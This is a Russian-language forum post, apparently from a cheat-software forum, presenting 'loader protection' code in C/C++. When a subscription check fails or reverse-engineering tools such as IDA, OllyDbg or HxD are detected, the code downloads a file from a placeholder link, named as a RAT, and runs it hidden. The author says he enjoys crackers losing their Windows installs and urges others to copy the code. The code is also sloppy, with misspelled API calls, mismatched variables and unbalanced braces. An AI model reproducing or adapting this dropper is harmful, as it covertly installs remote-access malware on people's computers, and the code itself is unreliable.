-
Автор темы
- #1
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Приветствую , недавно создал тему со скрином "лучшей защиты лоадера", кому нужно юзайте, но говорю защиту не сложно обойти, но её можно доработать .
-могут быть проблемы на этом форуме, если вы будете чит рекламировать здесь.
-защиту можно обойти.
-могут быть большие проблемы с репутацией вашего проекта.
+систему можно довести до ума
+если ваш софт будут крякать , время от времени некоторые мамины крякеры будут оставаться без винды, жёстко, но приятно порой читать что они пишут в личку после этого.
Время от времени будут попадаться челы на это ,если доработать систему то ещё чаще. Рекомендую в свои пасты добавлять эту защиту.
-могут быть проблемы на этом форуме, если вы будете чит рекламировать здесь.
-защиту можно обойти.
-могут быть большие проблемы с репутацией вашего проекта.
+систему можно довести до ума
+если ваш софт будут крякать , время от времени некоторые мамины крякеры будут оставаться без винды, жёстко, но приятно порой читать что они пишут в личку после этого.
Код:
BOOL IsAdministrator(VOID) // проверка на то, запустил ли пользователь лоадер от имени администратора
{
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
PSID AdministratorsGroup;
if (!AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup))
{
return FALSE;
}
BOOL IsInAdminGroup = FALSE;
if (!CheckTokenMembership(NULL, AdministratorsGroup, &IsInAdminGroup))
{
IsInAdminGroup = FALSE;
}
FreeSid(AdministratorsGroup);
return IsInAdminGroup;
}
bool doesHwidmatch() {
//создание канала для подключение и проверка на успешность создания канала, если успешно - true, если не успешно - false
//сюда я код не вставлял ибо смысла не вижу
}
char datareceived[4096]; // чтения файлов сервера о наличии подписки на софт и проверка на попытку кряка
DWORD NumberOfByteRead = 0;
while (InternetReadFile(OpenAdress, datareceived, 4096 & NumberOfBytesRead) && NumberOfBytesRead) {
InternetCloseHandle(OpenAdress);
InternetCloseHandle(connect);
if (Datareceived, "GUORQYFADS") { // в скобка вводим любой пароль, сообщаем продавцу что бы после создания файла с информацией о подписке юезра в сам файл вставлял этот код.
return true;
}
else
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
}
return false;
}
Время от времени будут попадаться челы на это ,если доработать систему то ещё чаще. Рекомендую в свои пасты добавлять эту защиту.
Код:
bool IsProcessRun(const char * const processName)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe;
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot, &pe);
while (1) {
if (strcmp(pe.szExeFile, processName) == 0) return true;
if (!Process32Next(hSnapshot, &pe)) return false;
}
}
void AntiDump()
{
if (IsProcessRun("idaq64.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
}
if (IsProcessRun("HxD.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
if (IsProcessRun("ResourceHacker.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
if (IsProcessRun("idaq32.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
}
if (IsProcessRun("ollydbg.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
}
if (IsProcessRun("httpdebugger.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
if (IsProcessRun("windowrenamer.exe"))
{
URLDowloadToFile(NULL, "ссылка на сайт", "назв файла, к примеру rat.exe", 0, 0);
WinExec(/*C:\\rat.exe*/"rat.exe", SW_HIDE);
exit(1);
}
}